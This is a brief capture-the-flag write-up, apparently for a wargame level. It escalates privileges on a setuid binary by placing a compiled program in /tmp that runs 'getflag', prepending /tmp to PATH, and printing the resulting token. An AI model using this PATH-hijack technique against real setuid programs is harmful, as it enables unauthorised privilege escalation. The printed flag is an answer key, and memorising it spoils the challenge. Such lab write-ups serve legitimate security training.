There just one file in home directory.
```
-rwsr-sr-x 1 flag03 level03 8627 Mar  5  2016 level03
```
The interesting fact that file owned by `flag03` - so it can be exploit challenge.

Run `./level03`  
Output: `Exploit me`

Command: `ltrace ./level03`  
Output:  
![alt text](./Screenshot.png)

As we can see `echo` taken from the environment so we can simply override it.

I've created and compiled the next program (location /tmp directory):
```
#include <stdlib.h>

int main() {
   system("getflag");
}
```
Command: `export PATH=/tmp:$PATH`  
Command: `./level03`  
Output: `Check flag.Here is your token :  qi0maab88jeaj46qoumi7maus`

Flag: `qi0maab88jeaj46qoumi7maus`